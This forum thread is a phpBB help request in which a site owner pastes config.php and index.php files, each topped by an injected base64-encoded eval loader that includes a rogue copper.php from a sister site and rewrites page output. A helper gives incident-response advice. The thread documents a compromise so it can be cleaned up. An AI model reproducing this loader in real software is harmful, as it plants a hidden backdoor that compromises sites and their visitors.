phpbb forums messed up

[squewheet]

I logged on my site and went to my phpbb forums and noticed that it was all messed up lookin. And I don't know how it got like that. Below is a link to my site and you can see what it looks like and maybe someone can tell me what it might be.

http://www.jonesdesignz.com/phpbb/portal.php

[darcie]

Look at your config.php file and see if there is code after the ?> Check your index.php and portal.php too.

[squewheet]

Config.php File Coding

Code: Select all

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCdkOi9oc2hvbWUvc3F1ZXdoZWV0L3N0ZXZlam9uZXNwbHVtYmluZy5jb20vQ29wcGVybWluZS9hbGJ1bXMvQmF0aHJvb20gUmVtb2RlbHMvY29wcGVyLnBocCcpKXtpbmNsdWRlX29uY2UoJ2Q6L2hzaG9tZS9zcXVld2hlZXQvc3RldmVqb25lc3BsdW1iaW5nLmNvbS9Db3BwZXJtaW5lL2FsYnVtcy9CYXRocm9vbSBSZW1vZGVscy9jb3BwZXIucGhwJyk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmIWZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7aWYoIWZ1bmN0aW9uX2V4aXN0cygnZ3pkZWNvZGUnKSl7ZnVuY3Rpb24gZ3pkZWNvZGUoJGQpeyRmPW9yZChzdWJzdHIoJGQsMywxKSk7JGg9MTA7JGU9MDtpZigkZiY0KXskZT11bnBhY2soJ3YnLHN1YnN0cigkZCwxMCwyKSk7JGU9JGVbMV07JGgrPTIrJGU7fWlmKCRmJjgpeyRoPXN0cnBvcygkZCxjaHIoMCksJGgpKzE7fWlmKCRmJjE2KXskaD1zdHJwb3MoJGQsY2hyKDApLCRoKSsxO31pZigkZiYyKXskaCs9Mjt9JHU9Z3ppbmZsYXRlKHN1YnN0cigkZCwkaCkpO2lmKCR1PT09RkFMU0UpeyR1PSRkO31yZXR1cm4gJHU7fX1mdW5jdGlvbiBkZ29iaCgkYil7SGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7JGM9Z3pkZWNvZGUoJGIpO2lmKHByZWdfbWF0Y2goJy9cPGJvZHkvc2knLCRjKSl7cmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPGJvZHlbXlw XSpcPikvc2knLCckMScuZ21sKCksJGMpO31lbHNle3JldHVybiBnbWwoKS4kYzt9fW9iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>
<?php
// phpBB 3.0.x auto-generated configuration file
// Do not change anything in this file!
$dbms = 'mysql';
$dbhost = 'mysql403.ixwebhosting.com';
$dbport = '';
$dbname = 'Squewhe_phpbb';
$dbuser = 'Squewhe_Admin';
$dbpasswd = '*******';
$table_prefix = 'phpbb_';
$acm_type = 'file';
$load_extensions = '';

@define('PHPBB_INSTALLED', true);
// @define('DEBUG', true);
// @define('DEBUG_EXTRA', true);
?>

Index.php File Coding

Code: Select all

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCdkOi9oc2hvbWUvc3F1ZXdoZWV0L3N0ZXZlam9uZXNwbHVtYmluZy5jb20vQ29wcGVybWluZS9hbGJ1bXMvQmF0aHJvb20gUmVtb2RlbHMvY29wcGVyLnBocCcpKXtpbmNsdWRlX29uY2UoJ2Q6L2hzaG9tZS9zcXVld2hlZXQvc3RldmVqb25lc3BsdW1iaW5nLmNvbS9Db3BwZXJtaW5lL2FsYnVtcy9CYXRocm9vbSBSZW1vZGVscy9jb3BwZXIucGhwJyk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmIWZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7aWYoIWZ1bmN0aW9uX2V4aXN0cygnZ3pkZWNvZGUnKSl7ZnVuY3Rpb24gZ3pkZWNvZGUoJGQpeyRmPW9yZChzdWJzdHIoJGQsMywxKSk7JGg9MTA7JGU9MDtpZigkZiY0KXskZT11bnBhY2soJ3YnLHN1YnN0cigkZCwxMCwyKSk7JGU9JGVbMV07JGgrPTIrJGU7fWlmKCRmJjgpeyRoPXN0cnBvcygkZCxjaHIoMCksJGgpKzE7fWlmKCRmJjE2KXskaD1zdHJwb3MoJGQsY2hyKDApLCRoKSsxO31pZigkZiYyKXskaCs9Mjt9JHU9Z3ppbmZsYXRlKHN1YnN0cigkZCwkaCkpO2lmKCR1PT09RkFMU0UpeyR1PSRkO31yZXR1cm4gJHU7fX1mdW5jdGlvbiBkZ29iaCgkYil7SGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7JGM9Z3pkZWNvZGUoJGIpO2lmKHByZWdfbWF0Y2goJy9cPGJvZHkvc2knLCRjKSl7cmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPGJvZHlbXlw XSpcPikvc2knLCckMScuZ21sKCksJGMpO31lbHNle3JldHVybiBnbWwoKS4kYzt9fW9iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>
<?php

/**

*

* @package phpBB3

* @version $Id: index.php 8479 2008-03-29 00:22:48Z naderman $

* @copyright (c) 2005 phpBB Group

* @license http://opensource.org/licenses/gpl-license.php GNU Public License

*

*/



/**

*/



/**

* @ignore

*/

define('IN_PHPBB', true);

$phpbb_root_path = (defined('PHPBB_ROOT_PATH')) ? PHPBB_ROOT_PATH : './';

$phpEx = substr(strrchr(__FILE__, '.'), 1);

include($phpbb_root_path . 'common.' . $phpEx);

include($phpbb_root_path . 'includes/functions_display.' . $phpEx);



// Start session management

$user->session_begin();

$auth->acl($user->data);

$user->setup('viewforum');

//-- mod : AJAX Chat ----------------------------------------------------

//-- add

include($phpbb_root_path . 'shout.' . $phpEx);

//-- fin mod : AJAX Chat ------------------------------------------------

display_forums('', $config['load_moderators']);



// Set some stats, get posts count from forums data if we... hum... retrieve all forums data

$total_posts    = $config['num_posts'];

$total_topics    = $config['num_topics'];

$total_users    = $config['num_users'];



$l_total_user_s = ($total_users == 0) ? 'TOTAL_USERS_ZERO' : 'TOTAL_USERS_OTHER';

$l_total_post_s = ($total_posts == 0) ? 'TOTAL_POSTS_ZERO' : 'TOTAL_POSTS_OTHER';

$l_total_topic_s = ($total_topics == 0) ? 'TOTAL_TOPICS_ZERO' : 'TOTAL_TOPICS_OTHER';



// Grab group details for legend display

if ($auth->acl_gets('a_group', 'a_groupadd', 'a_groupdel'))

{

    $sql = 'SELECT group_id, group_name, group_colour, group_type

        FROM ' . GROUPS_TABLE . '

        WHERE group_legend = 1

        ORDER BY group_name ASC';

}

else

{

    $sql = 'SELECT g.group_id, g.group_name, g.group_colour, g.group_type

        FROM ' . GROUPS_TABLE . ' g

        LEFT JOIN ' . USER_GROUP_TABLE . ' ug

            ON (

                g.group_id = ug.group_id

                AND ug.user_id = ' . $user->data['user_id'] . '

                AND ug.user_pending = 0

            )

        WHERE g.group_legend = 1

            AND (g.group_type <> ' . GROUP_HIDDEN . ' OR ug.user_id = ' . $user->data['user_id'] . ')

        ORDER BY g.group_name ASC';

}

$result = $db->sql_query($sql);



$legend = '';

while ($row = $db->sql_fetchrow($result))

{

    $colour_text = ($row['group_colour']) ? ' style="color:#' . $row['group_colour'] . '"' : '';



    if ($row['group_name'] == 'BOTS')

    {

        $legend .= (($legend != '') ? ', ' : '') . '<span' . $colour_text . '>' . $user->lang['G_BOTS'] . '</span>';

    }

    else

    {

        $legend .= (($legend != '') ? ', ' : '') . '<a' . $colour_text . ' href="' . append_sid("{$phpbb_root_path}memberlist.$phpEx", 'mode=group&g=' . $row['group_id']) . '">' . (($row['group_type'] == GROUP_SPECIAL) ? $user->lang['G_' . $row['group_name']] : $row['group_name']) . '</a>';

    }

}

$db->sql_freeresult($result);



// Generate birthday list if required ...

$birthday_list = '';

if ($config['load_birthdays'] && $config['allow_birthdays'])

{

    $now = getdate(time()   $user->timezone   $user->dst - date('Z'));

    $sql = 'SELECT user_id, username, user_colour, user_birthday

        FROM ' . USERS_TABLE . "

        WHERE user_birthday LIKE '" . $db->sql_escape(sprintf('----', $now['mday'], $now['mon'])) . "%'

            AND user_type IN (" . USER_NORMAL . ', ' . USER_FOUNDER . ')';

    $result = $db->sql_query($sql);



    while ($row = $db->sql_fetchrow($result))

    {

        $birthday_list .= (($birthday_list != '') ? ', ' : '') . get_username_string('full', $row['user_id'], $row['username'], $row['user_colour']);



        if ($age = (int) substr($row['user_birthday'], -4))

        {

            $birthday_list .= ' (' . ($now['year'] - $age) . ')';

        }

    }

    $db->sql_freeresult($result);

}



// Assign index specific vars

$template->assign_vars(array(

    'TOTAL_POSTS'    => sprintf($user->lang[$l_total_post_s], $total_posts),

    'TOTAL_TOPICS'    => sprintf($user->lang[$l_total_topic_s], $total_topics),

    'TOTAL_USERS'    => sprintf($user->lang[$l_total_user_s], $total_users),

    'NEWEST_USER'    => sprintf($user->lang['NEWEST_USER'], get_username_string('full', $config['newest_user_id'], $config['newest_username'], $config['newest_user_colour'])),



    'LEGEND'        => $legend,

    'BIRTHDAY_LIST'    => $birthday_list,



    'FORUM_IMG'                => $user->img('forum_read', 'NO_NEW_POSTS'),

    'FORUM_NEW_IMG'            => $user->img('forum_unread', 'NEW_POSTS'),

    'FORUM_LOCKED_IMG'        => $user->img('forum_read_locked', 'NO_NEW_POSTS_LOCKED'),

    'FORUM_NEW_LOCKED_IMG'    => $user->img('forum_unread_locked', 'NO_NEW_POSTS_LOCKED'),



    'S_LOGIN_ACTION'            => append_sid("{$phpbb_root_path}ucp.$phpEx", 'mode=login'),

    'S_DISPLAY_BIRTHDAY_LIST'    => ($config['load_birthdays']) ? true : false,



    'U_MARK_FORUMS'        => ($user->data['is_registered'] || $config['load_anon_lastread']) ? append_sid("{$phpbb_root_path}index.$phpEx", 'mark=forums') : '',

    'U_MCP'                => ($auth->acl_get('m_') || $auth->acl_getf_global('m_')) ? append_sid("{$phpbb_root_path}mcp.$phpEx", 'i=main&mode=front', true, $user->session_id) : '')

);



// Output page

page_header($user->lang['INDEX']);



$template->set_filenames(array(

    'body' => 'index_body.html')

);



page_footer();



?>

[darcie]

http://www.phpbb.com/community/viewtopi ... 543171#iit

My board has been hacked, what do I do? #
Please do the following before making any modifications to your board (this includes changing passwords, editing files, running the admin toolkit, etc.):
1) Save a copy of the files (simply create a local copy of the files on the server).
2) Save a copy of the database.
3) Save the server access logs for the time of the hack (they may be available in the 'logs' directory on the server, in your host's control panel or only by request directly from your host).
4) File a report in the incident tracker. Attach the items from steps 1-3 when you file the report or upload them to a secure location for the incident investigation team to download. Please do not start a new topic on the board, the proper place for incidents reports is the tracker.

[squewheet]

ok so your saying my site has been hacked. and i'm kinda dumb on the phpbb stuff so i might need your help on understanding some of this stuff.

[darcie]

Through some means, someone has inserted that code. It translates to something pulling from a coppermine gallery at stevejonesplumbing.com/Coppermine/albums/Bathroom Remodels/copper.php.

The instructions I gave you say to make a backup of everything- the files and the database. If you can access the server logs in your hosting control panel, please save those or ask your host. File a report through the link to the incident tracker. This appears to be an exploit somewhere other than phpBB, but, as we well know, holes in other applications can affect your board as well.

Once you have made backups of everything, clear those files of that code, or upload brand new files. Check into updates for any other applications.

[squewheet]

well see that is my parents site http://www.stevejonesplumbing.com

[darcie]

Well, they're on the same server, right? Just as our phpBB install was attacked through another application, yours is too. You'll need to have them update Coppermine, or make sure it is appropriately secured. The copper.php file is probably not one that should be there, as I saw it in other similar attacks recently.

[squewheet]

Yeah there on the same server cause I used one of there free coupons things to make my site. I don't want there site to get messed up. So do you think that if I delete that copper.php file it should be fine or what should I do.

[darcie]

Yeah, more likely it is their site messing yours up. As there was just a Coppermine security update released within the last week, make sure they update. Clean out all of your forum files for your own site. But if you don't patch other holes, this will likely happen again.